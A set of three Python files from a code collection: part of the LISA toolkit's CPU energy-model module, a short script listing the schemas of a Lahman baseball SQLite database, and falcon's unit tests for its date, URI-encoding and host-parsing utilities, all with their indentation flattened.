# Sanity check for active_states's frequencies
freqs = active_states.keys()
if not is_monotonic(freqs):
self._log.warning(
'Active states frequencies are expected to be '
'monotonically increasing. Freqs: {}'.format(freqs))
# Sanity check for active_states's powers
power_vals = [s.power for s in active_states.values()]
if not is_monotonic(power_vals):
self._log.warning(
'Active states powers are expected to be '
'monotonically increasing. Values: {}'.format(power_vals))
# Sanity check for idle_states powers
if idle_states:
power_vals = idle_states.values()
if not is_monotonic(power_vals, decreasing=True):
self._log.warning(
'Idle states powers are expected to be '
'monotonically decreasing. Values: {}'.format(power_vals))
if cpu is not None and not name:
name = 'cpu' + str(cpu)
self.name = name
self.active_states = active_states
self.idle_states = idle_states
@property
def max_capacity(self):
"""Compute capacity at highest frequency"""
return max(s.capacity for s in self.active_states.values())
class EnergyModelRoot(EnergyModelNode):
"""
Convenience class for root of an EnergyModelNode tree.
Just like EnergyModelNode except that ``active_states`` and ``idle_states``
aren't required.
"""
def __init__(self, active_states=None, idle_states=None,
cpu=None, children=None, name=None):
return super(EnergyModelRoot, self).__init__(
active_states, idle_states, cpu, children, name)
class PowerDomain(_CpuTree):
"""Describes the power domain hierarchy for an EnergyModel.
Power domains are a description of the topological dependencies in hardware
for entering idle states. "Composite" states such as cluster-sleep states
require a set of CPUs to all be idle before that state can be entered. In
that case those CPUs can be grouped into a power domain, and that composite
state attached to the power domain. Note that cpuidle is not aware of these
dependencies; they are typically handled by the platform firmware.
Exactly one of ``cpu`` and ``children`` must be given. That is, leaves of
the PowerDomain tree always contain exactly one CPU - each CPU is
represented as being in a power domain of its own. This represents the
assumption that all CPUs have at least one idle state (such as ARM WFI) that
they can enter independently of other CPUs.
:param idle_states: List of names of idle states for this power domain. Does
not store power data - these names are used as keys into
the ``idle_states`` field of :class:`EnergyModelNode`
objects.
:type idle_states: list(str)
:param cpu: The CPU this node represents. If provided, this is a leaf node.
:type cpu: int
:param children: Non-empty list of child :class:`PowerDomain` objects
:type children: list(PowerDomain)
:ivar cpus: CPUs contained in this node. Includes those of child nodes.
:type cpus: tuple(int)
"""
def __init__(self, idle_states, cpu=None, children=None):
if idle_states is None:
raise ValueError('idle_states cannot be None (but may be empty)')
super(PowerDomain, self).__init__(cpu, children)
self.idle_states = idle_states
class EnergyModel(object):
"""Represents hierarchical CPU topology with power and capacity data
An energy model consists of
- A CPU topology, representing the physical (cache/interconnect) topology of
the CPUs. Each node stores the energy usage of that node's hardware when
it is in each active or idle state. They also store a compute capacity at
each frequency, but this is only meaningful for leaf nodes (CPUs) and may
be None at higher levels. These capacity values are relative; the maximum
capacity would usually be 1024, the value of SCHED_CAPACITY_SCALE in the
Linux kernel scheduler. Use EnergyModelNodes to describe this.
- A power domain topology, representing the hierarchy of areas that can be
powered down (idled).
The power domains are a single tree. Leaf nodes must contain exactly one
CPU and the root node must indirectly contain every CPU. Each power domain
has a list (maybe empty) of names of idle states that that domain can
enter.
Use PowerDomains to describe this.
- A set of frequency domains, representing groups of CPUs whose clock
frequencies must be equal (probably because they share a clock). The
frequency domains must be a partition of the CPUs.
:ivar cpu_nodes: List of leaf (CPU) :class:`EnergyModelNode`
:ivar cpus: List of logical CPU numbers in the system
:param root_node: Root of :class:`EnergyModelNode` tree
:param root_power_domain: Root of :class:`PowerDomain` tree
:param freq_domains: Collection of collections of logical CPU numbers
representing frequency (clock) domains.
.. note::
The most signficant shortcomings of the model are:
1. Voltage domains are assumed to be congruent to frequency domains
2. Idle state power is assumed to be independent of voltage
3. Temperature is ignored entirely
.. _cpu-utils:
.. admonition:: ``cpu_utils``: CPU util distributions
Used throughout this module: A ``cpu_utils`` is a list ``u`` where
``u[N]`` is the sum of the frequency-invariant, capacity-invariant
utilization of tasks placed on CPU N. That is, the quantity represented
by a CPU runqueue's util_avg in the Linux kernel scheduler's
load-tracking system with EAS features enabled.
The range of utilization values is 0 -
:attr:`EnergyModel.capacity_scale`.
This represents a static utilization, assuming that tasks don't change
in size (for example representing a set of fixed periodic RT-App
workloads). For workloads that change over time, a series of
``cpu_utils`` items would be needed to describe the utilization, with a
distinct estimation for each item in the series.
"""
capacity_scale = 1024
"""The relative computational capacity of the most powerful CPU at its
highest available frequency.
"""
def __init__(self, root_node, root_power_domain, freq_domains):
self.cpus = root_node.cpus
if self.cpus != tuple(range(len(self.cpus))):
raise ValueError('CPU IDs [{}] are sparse'.format(self.cpus))
# Check that freq_domains is a partition of the CPUs
fd_intersection = set().intersection(*freq_domains)
if fd_intersection:
raise ValueError('CPUs {} exist in multiple freq domains'.format(
fd_intersection))
fd_difference = set(self.cpus) - set().union(*freq_domains)
if fd_difference:
raise ValueError('CPUs {} not in any frequency domain'.format(
fd_difference))
self.freq_domains = freq_domains
# Check that nodes with energy data are all within a frequency domain
for node in root_node.iter_nodes():
if not node.active_states or node.idle_states:
continue
cpu_freq_doms = []
for cpu in node.cpus:
[cpu_freq_dom] = [d for d in freq_domains if cpu in d]
cpu_freq_doms.append(cpu_freq_dom)
if not all(d == cpu_freq_doms[0] for d in cpu_freq_doms[1:]):
raise ValueError(
'Node {} (CPUs {}) '
'has energy data and overlaps freq domains'.format(
node.name, node.cpus))
def sorted_leaves(root):
# Get a list of the leaf (cpu) nodes of a _CpuTree in order of the
# CPU ID
ret = sorted(list(root.iter_leaves()), key=lambda n: n.cpus[0])
assert all(len(n.cpus) == 1 for n in ret)
return ret
self.root = root_node
self.cpu_nodes = sorted_leaves(root_node)
self.cpu_pds = sorted_leaves(root_power_domain)
assert len(self.cpu_pds) == len(self.cpu_nodes)
self._log = logging.getLogger('EnergyModel')
max_cap = max(n.max_capacity for n in self.cpu_nodes)
if max_cap != self.capacity_scale:
self._log.debug(
'Unusual max capacity (%s), overriding capacity_scale', max_cap)
self.capacity_scale = max_cap
def _cpus_with_capacity(self, cap):
"""
Helper method to find the CPUs whose max capacity equals cap
"""
return [c for c in self.cpus
if self.cpu_nodes[c].max_capacity == cap]
@property
@memoized
def biggest_cpus(self):
"""
The CPUs with the highest compute capacity at their highest frequency
"""
return self._cpus_with_capacity(self.capacity_scale)
@property
@memoized
def littlest_cpus(self):
"""
The CPUs with the lowest compute capacity at their highest frequency
"""
min_cap = min(n.max_capacity for n in self.cpu_nodes)
return self._cpus_with_capacity(min_cap)
@property
@memoized
def is_heterogeneous(self):
"""
True iff CPUs do not all have the same efficiency and OPP range
"""
states = self.cpu_nodes[0].active_states
return any(c.active_states != states for c in self.cpu_nodes[1:])
@property
@memoized
def cpu_groups(self):
"""
List of lists of CPUs who share the same active state values
"""
groups = []
for node in self.cpu_nodes:
for group in groups:
group_states = self.cpu_nodes[group[0]].active_states
if node.active_states == group_states:
group.append(node.cpu)
break
else:
groups.append([node.cpu])
return groups
def _guess_idle_states(self, cpus_active):
def find_deepest(pd):
if not any(cpus_active[c] for c in pd.cpus):
if pd.parent:
parent_state = find_deepest(pd.parent)
if parent_state:
return parent_state
return pd.idle_states[-1] if len(pd.idle_states) else None
return None
return [find_deepest(pd) for pd in self.cpu_pds]
def get_cpu_capacity(self, cpu, freq=None):
"""Convenience method to get the capacity of a CPU at a given frequency
:param cpu: CPU to get capacity for
:param freq: Frequency to get the CPU capacity at. Default is max
capacity.
"""
if freq is None:
return self.cpu_nodes[cpu].max_capacity
return self.cpu_nodes[cpu].active_states[freq].capacity
def guess_idle_states(self, cpus_active):
"""Pessimistically guess the idle states that each CPU may enter
If a CPU has any tasks it is estimated that it may only enter its
shallowest idle state in between task activations. If all the CPUs
within a power domain have no tasks, they will all be judged able to
enter that domain's deepest idle state. If any CPU in a domain has work,
no CPUs in that domain are assumed to enter any domain shared state.
e.g. Consider a system with
- two power domains PD0 and PD1
- 4 CPUs, with CPUs [0, 1] in PD0 and CPUs [2, 3] in PD1
- 4 idle states: "WFI", "cpu-sleep", "cluster-sleep-0" and
"cluster-sleep-1", where the "cluster-sleep-*" states domain states,
i.e. a CPU can only enter those states when both CPUs in the domain
are idle.
Then here are some example inputs and outputs:
::
# All CPUs idle:
[0, 0, 0, 0] -> ["cluster-sleep-1", "cluster-sleep-1",
"cluster-sleep-1", "cluster-sleep-1"]
# All CPUs have work
[1, 1, 1, 1] -> ["WFI","WFI","WFI", "WFI"]
# One power domain active, the other idle
[0, 0, 1, 1] -> ["cluster-sleep-1", "cluster-sleep-1", "WFI","WFI"]
# One CPU active.
# Note that CPU 2 has no work but is assumed to never be able to enter
# any "cluster" state.
[0, 0, 0, 1] -> ["cluster-sleep-1", "cluster-sleep-1",
"cpu-sleep","WFI"]
:param cpus_active: list where bool(cpus_active[N]) is False iff no
tasks will run on CPU N.
:returns: List ``ret`` where ``ret[N]`` is the name of the estimated
idle state that CPU N can enter during idle periods.
"""
states = self._guess_idle_states(cpus_active)
return [s or c.idle_states.keys()[0]
for s, c in zip(states, self.cpu_nodes)]
def _guess_freqs(self, cpu_utils):
overutilized = False
# Find what frequency each CPU would need if it was alone in its
# frequency domain
ideal_freqs = [0 for _ in self.cpus]
for node in self.cpu_nodes:
[cpu] = node.cpus
required_cap = cpu_utils[cpu]
possible_freqs = [f for f, s in node.active_states.iteritems()
if s.capacity >= required_cap]
if possible_freqs:
ideal_freqs[cpu] = min(possible_freqs)
else:
# CPU cannot provide required capacity, use max freq
ideal_freqs[cpu] = max(node.active_states.keys())
overutilized = True
# Rectify the frequencies among domains
freqs = [0 for _ in ideal_freqs]
for domain in self.freq_domains:
domain_freq = max(ideal_freqs[c] for c in domain)
for cpu in domain:
freqs[cpu] = domain_freq
return freqs, overutilized
def guess_freqs(self, cpu_utils):
"""Work out CPU frequencies required to execute a workload
Find the lowest possible frequency for each CPU that provides enough
capacity to satisfy the utilization, taking into account frequency
domains.
:param cpu_utils: Utilization distribution, see
:ref:`cpu_utils <cpu-utils>`
:returns: List ``ret`` where ``ret[N]`` is the frequency that CPU N must
run at
"""
freqs, _ = self._guess_freqs(cpu_utils)
return freqs
def _estimate_from_active_time(self, cpu_active_time, freqs, idle_states,
combine):
"""Helper for estimate_from_cpu_util
Like estimate_from_cpu_util but uses active time i.e. proportion of time
spent not-idle in the range 0.0 - 1.0.
If combine=False, return idle and active power as separate components.
"""
power = 0
ret = {}
assert all(0.0 <= a <= 1.0 for a in cpu_active_time)
for node in self.root.iter_nodes():
# Some nodes might not have energy model data, they could just be
# used to group other nodes (likely the root node, for example).
if not node.active_states or not node.idle_states:
continue
cpus = tuple(node.cpus)
# For now we assume topology nodes with energy models do not overlap
# with frequency domains
freq = freqs[cpus[0]]
assert all(freqs[c] == freq for c in cpus[1:])
# The active time of a node is estimated as the max of the active
# times of its children.
# This works great for the synthetic periodic workloads we use in
# LISA (where all threads wake up at the same time) but is probably
# no good for real workloads.
active_time = max(cpu_active_time[c] for c in cpus)
active_power = node.active_states[freq].power * active_time
_idle_power = max(node.idle_states[idle_states[c]] for c in cpus)
idle_power = _idle_power * (1 - active_time)
if combine:
ret[cpus] = active_power + idle_power
else:
ret[cpus] = {}
ret[cpus]["active"] = active_power
ret[cpus]["idle"] = idle_power
return ret
def estimate_from_cpu_util(self, cpu_utils, freqs=None, idle_states=None):
"""
Estimate the energy usage of the system under a utilization distribution
Optionally also take freqs; a list of frequencies at which each CPU is
assumed to run, and idle_states, the idle states that each CPU can enter
between activations. If not provided, they will be estimated assuming an
ideal selection system (i.e. perfect cpufreq & cpuidle governors).
:param cpu_utils: Utilization distribution, see
:ref:`cpu_utils <cpu-utils>`
:param freqs: List of CPU frequencies. Got from :meth:`guess_freqs` by
default.
:param idle_states: List of CPU frequencies. Got from
:meth:`guess_idle_states` by default.
:returns: Dict with power in bogo-Watts (bW), with contributions from
each system component keyed with a tuple of the CPUs
comprising that component (i.e. :attr:EnergyModelNode.cpus)
::
{
(0,) : 10,
(1,) : 10,
(0, 1) : 5,
}
This represents CPUs 0 and 1 each using 10bW and their shared
resources using 5bW for a total of 25bW.
"""
if len(cpu_utils) != len(self.cpus):
raise ValueError(
'cpu_utils length ({}) must equal CPU count ({})'.format(
len(cpu_utils), len(self.cpus)))
if freqs is None:
freqs = self.guess_freqs(cpu_utils)
if idle_states is None:
idle_states = self.guess_idle_states(cpu_utils)
cpu_active_time = []
for cpu, node in enumerate(self.cpu_nodes):
assert (cpu,) == node.cpus
cap = node.active_states[freqs[cpu]].capacity
cpu_active_time.append(min(float(cpu_utils[cpu]) / cap, 1.0))
return self._estimate_from_active_time(cpu_active_time,
freqs, idle_states, combine=True)
def get_optimal_placements(self, capacities):
"""Find the optimal distribution of work for a set of tasks
Find a list of candidates which are estimated to be optimal in terms of
power consumption, but that do not result in any CPU becoming
over-utilized.
If no such candidates exist, i.e. the system being modeled cannot
satisfy the workload's throughput requirements, an
:class:`EnergyModelCapacityError` is raised. For example, if e was an
EnergyModel modeling two CPUs with capacity 1024, this error would be
raised by:
::
e.get_optimal_placements({"t1": 800, "t2": 800, "t3: "800"})
This estimation assumes an ideal system of selecting OPPs and idle
states for CPUs.
.. note::
This is a brute force search taking time exponential wrt. the number
of tasks.
:param capacities: Dict mapping tasks to expected utilization
values. These tasks are assumed not to change; they
have a single static utilization value. A set of
single-phase periodic RT-App tasks is an example of a
suitable workload for this model.
:returns: List of ``cpu_utils`` items representing distributions of work
under optimal task placements, see
:ref:`cpu_utils <cpu-utils>`. Multiple task placements
that result in the same CPU utilizations are considered
equivalent.
"""
tasks = capacities.keys()
num_candidates = len(self.cpus) ** len(tasks)
self._log.debug(
'%14s - Searching %d configurations for optimal task placement...',
'EnergyModel', num_candidates)
candidates = {}
excluded = []
for cpus in product(self.cpus, repeat=len(tasks)):
placement = {task: cpu for task, cpu in zip(tasks, cpus)}
util = [0 for _ in self.cpus]
for task, cpu in placement.items():
util[cpu] += capacities[task]
util = tuple(util)
# Filter out candidate placements that have tasks greater than max
# or that we have already determined that we cannot place.
if (any(u > self.capacity_scale for u in util) or util in excluded):
continue
if util not in candidates:
freqs, overutilized = self._guess_freqs(util)
if overutilized:
# This isn't a valid placement
excluded.append(util)
else:
power = self.estimate_from_cpu_util(util, freqs=freqs)
candidates[util] = sum(power.values())
if not candidates:
# The system can't provide full throughput to this workload.
raise EnergyModelCapacityError(
"Can't handle workload - total cap = {}".format(
sum(capacities.values())))
# Whittle down to those that give the lowest energy estimate
min_power = min(p for p in candidates.itervalues())
ret = [u for u, p in candidates.iteritems() if p == min_power]
self._log.debug('%14s - Done', 'EnergyModel')
return ret
@classmethod
def _find_core_groups(cls, target):
"""
Read the core_siblings masks for each CPU from sysfs
:param target: Devlib Target object to read masks from
:returns: A list of tuples of ints, representing the partition of core
siblings
"""
cpus = range(target.number_of_cpus)
topology_base = '/sys/devices/system/cpu/'
# We only care about core_siblings, but let's check *_siblings, so we
# can throw an error if a CPU's thread_siblings isn't just itself, or if
# there's a topology level we don't understand.
# Since we might have to read a lot of files, read everything we need in
# one go to avoid taking too long.
mask_glob = topology_base + 'cpu**/topology/*_siblings'
file_values = read_multiple_oneline_files(target, [mask_glob])
regex = re.compile(
topology_base + r'cpu([0-9]+)/topology/([a-z]+)_siblings')
ret = set()
for path, mask_str in file_values.iteritems():
match = regex.match(path)
cpu = int(match.groups()[0])
level = match.groups()[1]
# mask_to_list returns the values in descending order, so we'll sort
# them ascending. This isn't strictly necessary but it's nicer.
siblings = tuple(sorted(mask_to_list(int(mask_str, 16))))
if level == 'thread':
if siblings != (cpu,):
# SMT systems aren't supported
raise RuntimeError('CPU{} thread_siblings is {}. '
'expected {}'.format(cpu, siblings, [cpu]))
continue
if level != 'core':
# The only other levels we should expect to find are 'book' and
# 'shelf', which are not used by architectures we support.
raise RuntimeError(
'Unrecognised topology level "{}"'.format(level))
ret.add(siblings)
# Sort core groups so that the lowest-numbered cores are first
# Again, not strictly necessary, just more pleasant.
return sorted(ret, key=lambda x: x[0])
@classmethod
def from_target(cls, target):
"""
Create an EnergyModel by reading a target filesystem
This uses the sysctl added by EAS pathces to exposes the cap_states and
idle_states fields for each sched_group. This feature depends on
CONFIG_SCHED_DEBUG, and is not upstream in mainline Linux (as of v4.11),
so this method is only tested with Android kernels.
The kernel doesn't have an power domain data, so this method assumes
that all CPUs are totally independent wrt. idle states - the EnergyModel
constructed won't be aware of the topological dependencies for entering
"cluster" idle states.
Assumes the energy model has two-levels (plus the root) - a level for
CPUs and a level for 'clusters'.
:param target: Devlib target object to read filesystem from. Must have
cpufreq and cpuidle modules enabled.
:returns: Constructed EnergyModel object based on the parameters
reported by the target.
"""
if 'cpufreq' not in target.modules:
raise TargetError('Requires cpufreq devlib module. Please ensure '
'"cpufreq" is listed in your target/test modules')
if 'cpuidle' not in target.modules:
raise TargetError('Requires cpuidle devlib module. Please ensure '
'"cpuidle" is listed in your target/test modules')
def sge_path(cpu, domain, group, field):
f = '/proc/sys/kernel/sched_domain/cpu{}/domain{}/group{}/energy/{}'
return f.format(cpu, domain, group, field)
# Read all the files we might need in one go, otherwise this will take
# ages.
sge_globs = [sge_path('**', '**', '**', 'cap_states'),
sge_path('**', '**', '**', 'idle_states')]
sge_file_values = read_multiple_oneline_files(target, sge_globs)
if not sge_file_values:
raise TargetError('Energy Model not exposed in sysfs. '
'Check CONFIG_SCHED_DEBUG is enabled.')
# These functions read the cap_states and idle_states vectors for the
# first sched_group in the sched_domain for a given CPU at a given
# level. That first group will include the given CPU. So
# read_active_states(0, 0) will give the CPU-level active_states for
# CPU0 and read_active_states(0, 1) will give the "cluster"-level
# active_states for the "cluster" that contains CPU0.
def read_sge_file(path):
try:
return sge_file_values[path]
except KeyError as e:
raise TargetError('No such file: {}'.format(e))
def read_active_states(cpu, domain_level):
cap_states_path = sge_path(cpu, domain_level, 0, 'cap_states')
cap_states_strs = read_sge_file(cap_states_path).split()
# cap_states lists the capacity of each state followed by its power,
# in increasing order. The `zip` call does this:
# [c0, p0, c1, p1, c2, p2] -> [(c0, p0), (c1, p1), (c2, p2)]
cap_states = [ActiveState(capacity=int(c), power=int(p))
for c, p in zip(cap_states_strs[0::2],
cap_states_strs[1::2])]
freqs = target.cpufreq.list_frequencies(cpu)
return OrderedDict(zip(sorted(freqs), cap_states))
def read_idle_states(cpu, domain_level):
idle_states_path = sge_path(cpu, domain_level, 0, 'idle_states')
idle_states_strs = read_sge_file(idle_states_path).split()
# get_states should return the state names in increasing depth order
names = [s.name for s in target.cpuidle.get_states(cpu)]
# idle_states is a list of power values in increasing order of
# idle-depth/decreasing order of power.
return OrderedDict(zip(names, [int(p) for p in idle_states_strs]))
# Read the CPU-level data from sched_domain level 0
cpus = range(target.number_of_cpus)
cpu_nodes = []
for cpu in cpus:
node = EnergyModelNode(
cpu=cpu,
active_states=read_active_states(cpu, 0),
idle_states=read_idle_states(cpu, 0))
cpu_nodes.append(node)
# Read the "cluster" level data from sched_domain level 1
core_group_nodes = []
for core_group in cls._find_core_groups(target):
node=EnergyModelNode(
children=[cpu_nodes[c] for c in core_group],
active_states=read_active_states(core_group[0], 1),
idle_states=read_idle_states(core_group[0], 1))
core_group_nodes.append(node)
root = EnergyModelRoot(children=core_group_nodes)
# Use cpufreq to figure out the frequency domains
freq_domains = []
remaining_cpus = set(cpus)
while remaining_cpus:
cpu = next(iter(remaining_cpus))
dom = target.cpufreq.get_related_cpus(cpu)
freq_domains.append(dom)
remaining_cpus = remaining_cpus.difference(dom)
# We don't have a way to read the power domains from sysfs (the kernel
# isn't even aware of them) so we'll just have to assume each CPU is its
# own power domain and all idle states are independent of each other.
cpu_pds = []
for cpu in cpus:
names = [s.name for s in target.cpuidle.get_states(cpu)]
cpu_pds.append(PowerDomain(cpu=cpu, idle_states=names))
root_pd=PowerDomain(children=cpu_pds, idle_states=[])
return cls(root_node=root,
root_power_domain=root_pd,
freq_domains=freq_domains)
|
the-stack_106_22073
|
FILENAME = "path/to/lahman2016.sqlite"
# import `pandas` and `sqlite3`
import pandas as pd
import sqlite3
# Connecting to SQLite Database
conn = sqlite3.connect(FILENAME)
# Querying Database for all seasons where a team played 150 or more games and is still active today.
query = "select name from sqlite_master where type = 'table';"
# Creating dataframe from query.
tables = conn.execute(query).fetchall()
# schema
query = "select sql from sqlite_master where type = 'table' and name = ?;"
# num of record
# query = "select count(*) from ?;"
for t in tables:
r = conn.execute(query, t).fetchone()
print("TABLE: ", t[0])
print("SCHEMA: ", r[0])
print()
|
the-stack_106_22075
|
# -*- coding: utf-8 -*-
from datetime import datetime
import functools
import random
import pytest
import falcon
from falcon import testing
from falcon import util
from falcon.util import compat, json, uri
def _arbitrary_uris(count, length):
return (
u''.join(
[random.choice(uri._ALL_ALLOWED)
for _ in range(length)]
) for __ in range(count)
)
class TestFalconUtils(object):
def setup_method(self, method):
# NOTE(cabrera): for DRYness - used in uri.[de|en]code tests
# below.
self.uris = _arbitrary_uris(count=100, length=32)
def test_deprecated_decorator(self):
msg = 'Please stop using this thing. It is going away.'
@util.deprecated(msg)
def old_thing():
pass
with pytest.warns(UserWarning) as rec:
old_thing()
warn = rec.pop()
assert msg in str(warn.message)
def test_http_now(self):
expected = datetime.utcnow()
actual = falcon.http_date_to_dt(falcon.http_now())
delta = actual - expected
delta_sec = abs(delta.days * 86400 + delta.seconds)
assert delta_sec <= 1
def test_dt_to_http(self):
assert falcon.dt_to_http(datetime(2013, 4, 4)) == 'Thu, 04 Apr 2013 00:00:00 GMT'
assert falcon.dt_to_http(
datetime(2013, 4, 4, 10, 28, 54)
) == 'Thu, 04 Apr 2013 10:28:54 GMT'
def test_http_date_to_dt(self):
assert falcon.http_date_to_dt('Thu, 04 Apr 2013 00:00:00 GMT') == datetime(2013, 4, 4)
assert falcon.http_date_to_dt(
'Thu, 04 Apr 2013 10:28:54 GMT'
) == datetime(2013, 4, 4, 10, 28, 54)
with pytest.raises(ValueError):
falcon.http_date_to_dt('Thu, 04-Apr-2013 10:28:54 GMT')
assert falcon.http_date_to_dt(
'Thu, 04-Apr-2013 10:28:54 GMT', obs_date=True
) == datetime(2013, 4, 4, 10, 28, 54)
with pytest.raises(ValueError):
falcon.http_date_to_dt('Sun Nov 6 08:49:37 1994')
with pytest.raises(ValueError):
falcon.http_date_to_dt('Nov 6 08:49:37 1994', obs_date=True)
assert falcon.http_date_to_dt(
'Sun Nov 6 08:49:37 1994', obs_date=True
) == datetime(1994, 11, 6, 8, 49, 37)
assert falcon.http_date_to_dt(
'Sunday, 06-Nov-94 08:49:37 GMT', obs_date=True
) == datetime(1994, 11, 6, 8, 49, 37)
def test_pack_query_params_none(self):
assert falcon.to_query_str({}) == ''
def test_pack_query_params_one(self):
assert falcon.to_query_str({'limit': 10}) == '?limit=10'
assert falcon.to_query_str(
{'things': [1, 2, 3]}) == '?things=1,2,3'
assert falcon.to_query_str({'things': ['a']}) == '?things=a'
assert falcon.to_query_str(
{'things': ['a', 'b']}) == '?things=a,b'
expected = ('?things=a&things=b&things=&things=None'
'&things=true&things=false&things=0')
actual = falcon.to_query_str(
{'things': ['a', 'b', '', None, True, False, 0]},
comma_delimited_lists=False
)
assert actual == expected
def test_pack_query_params_several(self):
garbage_in = {
'limit': 17,
'echo': True,
'doit': False,
'x': 'val',
'y': 0.2
}
query_str = falcon.to_query_str(garbage_in)
fields = query_str[1:].split('&')
garbage_out = {}
for field in fields:
k, v = field.split('=')
garbage_out[k] = v
expected = {
'echo': 'true',
'limit': '17',
'x': 'val',
'y': '0.2',
'doit': 'false'}
assert expected == garbage_out
def test_uri_encode(self):
url = 'http://example.com/v1/fizbit/messages?limit=3&echo=true'
assert uri.encode(url) == url
url = 'http://example.com/v1/fiz bit/messages'
expected = 'http://example.com/v1/fiz%20bit/messages'
assert uri.encode(url) == expected
url = u'http://example.com/v1/fizbit/messages?limit=3&e\u00e7ho=true'
expected = ('http://example.com/v1/fizbit/messages'
'?limit=3&e%C3%A7ho=true')
assert uri.encode(url) == expected
def test_uri_encode_double(self):
url = 'http://example.com/v1/fiz bit/messages'
expected = 'http://example.com/v1/fiz%20bit/messages'
assert uri.encode(uri.encode(url)) == expected
url = u'http://example.com/v1/fizbit/messages?limit=3&e\u00e7ho=true'
expected = ('http://example.com/v1/fizbit/messages'
'?limit=3&e%C3%A7ho=true')
assert uri.encode(uri.encode(url)) == expected
url = 'http://example.com/v1/fiz%bit/mess%ages/%'
expected = 'http://example.com/v1/fiz%25bit/mess%25ages/%25'
assert uri.encode(uri.encode(url)) == expected
url = 'http://example.com/%%'
expected = 'http://example.com/%25%25'
assert uri.encode(uri.encode(url)) == expected
# NOTE(kgriffs): Specific example cited in GH issue
url = 'http://something?redirect_uri=http%3A%2F%2Fsite'
assert uri.encode(url) == url
hex_digits = 'abcdefABCDEF0123456789'
for c1 in hex_digits:
for c2 in hex_digits:
url = 'http://example.com/%' + c1 + c2
encoded = uri.encode(uri.encode(url))
assert encoded == url
def test_uri_encode_value(self):
assert uri.encode_value('abcd') == 'abcd'
assert uri.encode_value(u'abcd') == u'abcd'
assert uri.encode_value(u'ab cd') == u'ab%20cd'
assert uri.encode_value(u'\u00e7') == '%C3%A7'
assert uri.encode_value(u'\u00e7\u20ac') == '%C3%A7%E2%82%AC'
assert uri.encode_value('ab/cd') == 'ab%2Fcd'
assert uri.encode_value('ab+cd=42,9') == 'ab%2Bcd%3D42%2C9'
def test_uri_decode(self):
assert uri.decode('abcd') == 'abcd'
assert uri.decode(u'abcd') == u'abcd'
assert uri.decode(u'ab%20cd') == u'ab cd'
assert uri.decode('This thing is %C3%A7') == u'This thing is \u00e7'
assert uri.decode('This thing is %C3%A7%E2%82%AC') == u'This thing is \u00e7\u20ac'
assert uri.decode('ab%2Fcd') == 'ab/cd'
assert uri.decode(
'http://example.com?x=ab%2Bcd%3D42%2C9'
) == 'http://example.com?x=ab+cd=42,9'
def test_prop_uri_encode_models_stdlib_quote(self):
equiv_quote = functools.partial(
compat.quote, safe=uri._ALL_ALLOWED
)
for case in self.uris:
expect = equiv_quote(case)
actual = uri.encode(case)
assert expect == actual
def test_prop_uri_encode_value_models_stdlib_quote_safe_tilde(self):
equiv_quote = functools.partial(
compat.quote, safe='~'
)
for case in self.uris:
expect = equiv_quote(case)
actual = uri.encode_value(case)
assert expect == actual
def test_prop_uri_decode_models_stdlib_unquote_plus(self):
stdlib_unquote = compat.unquote_plus
for case in self.uris:
case = uri.encode_value(case)
expect = stdlib_unquote(case)
actual = uri.decode(case)
assert expect == actual
def test_unquote_string(self):
assert uri.unquote_string('v') == 'v'
assert uri.unquote_string('not-quoted') == 'not-quoted'
assert uri.unquote_string('partial-quoted"') == 'partial-quoted"'
assert uri.unquote_string('"partial-quoted') == '"partial-quoted'
assert uri.unquote_string('"partial-quoted"') == 'partial-quoted'
def test_parse_query_string(self):
query_strinq = (
'a=http%3A%2F%2Ffalconframework.org%3Ftest%3D1'
'&b=%7B%22test1%22%3A%20%22data1%22%'
'2C%20%22test2%22%3A%20%22data2%22%7D'
'&c=1,2,3'
'&d=test'
'&e=a,,%26%3D%2C'
'&f=a&f=a%3Db'
'&%C3%A9=a%3Db'
)
decoded_url = 'http://falconframework.org?test=1'
decoded_json = '{"test1": "data1", "test2": "data2"}'
result = uri.parse_query_string(query_strinq)
assert result['a'] == decoded_url
assert result['b'] == decoded_json
assert result['c'] == ['1', '2', '3']
assert result['d'] == 'test'
assert result['e'] == ['a', '&=,']
assert result['f'] == ['a', 'a=b']
assert result[u'é'] == 'a=b'
result = uri.parse_query_string(query_strinq, True)
assert result['a'] == decoded_url
assert result['b'] == decoded_json
assert result['c'] == ['1', '2', '3']
assert result['d'] == 'test'
assert result['e'] == ['a', '', '&=,']
assert result['f'] == ['a', 'a=b']
assert result[u'é'] == 'a=b'
def test_parse_host(self):
assert uri.parse_host('::1') == ('::1', None)
assert uri.parse_host('2001:ODB8:AC10:FE01::') == ('2001:ODB8:AC10:FE01::', None)
assert uri.parse_host(
'2001:ODB8:AC10:FE01::', default_port=80
) == ('2001:ODB8:AC10:FE01::', 80)
ipv6_addr = '2001:4801:1221:101:1c10::f5:116'
assert uri.parse_host(ipv6_addr) == (ipv6_addr, None)
assert uri.parse_host('[' + ipv6_addr + ']') == (ipv6_addr, None)
assert uri.parse_host('[' + ipv6_addr + ']:28080') == (ipv6_addr, 28080)
assert uri.parse_host('[' + ipv6_addr + ']:8080') == (ipv6_addr, 8080)
assert uri.parse_host('[' + ipv6_addr + ']:123') == (ipv6_addr, 123)
assert uri.parse_host('[' + ipv6_addr + ']:42') == (ipv6_addr, 42)
assert uri.parse_host('173.203.44.122') == ('173.203.44.122', None)
assert uri.parse_host('173.203.44.122', default_port=80) == ('173.203.44.122', 80)
assert uri.parse_host('173.203.44.122:27070') == ('173.203.44.122', 27070)
assert uri.parse_host('173.203.44.122:123') == ('173.203.44.122', 123)
assert uri.parse_host('173.203.44.122:42') == ('173.203.44.122', 42)
assert uri.parse_host('example.com') == ('example.com', None)
assert uri.parse_host('example.com', default_port=443) == ('example.com', 443)
assert uri.parse_host('falcon.example.com') == ('falcon.example.com', None)
assert uri.parse_host('falcon.example.com:9876') == ('falcon.example.com', 9876)
assert uri.parse_host('falcon.example.com:42') == ('falcon.example.com', 42)
def test_get_http_status(self):
assert falcon.get_http_status(404) == falcon.HTTP_404
assert falcon.get_http_status(404.3) == falcon.HTTP_404
assert falcon.get_http_status('404.3') == falcon.HTTP_404
assert falcon.get_http_status(404.9) == falcon.HTTP_404
assert falcon.get_http_status('404') == falcon.HTTP_404
assert falcon.get_http_status(123) == '123 Unknown'
with pytest.raises(ValueError):
falcon.get_http_status('not_a_number')
with pytest.raises(ValueError):
falcon.get_http_status(0)
with pytest.raises(ValueError):
falcon.get_http_status(0)
with pytest.raises(ValueError):
falcon.get_http_status(99)
with pytest.raises(ValueError):
falcon.get_http_status(-404.3)
with pytest.raises(ValueError):
falcon.get_http_status('-404')
with pytest.raises(ValueError):
falcon.get_http_status('-404.3')
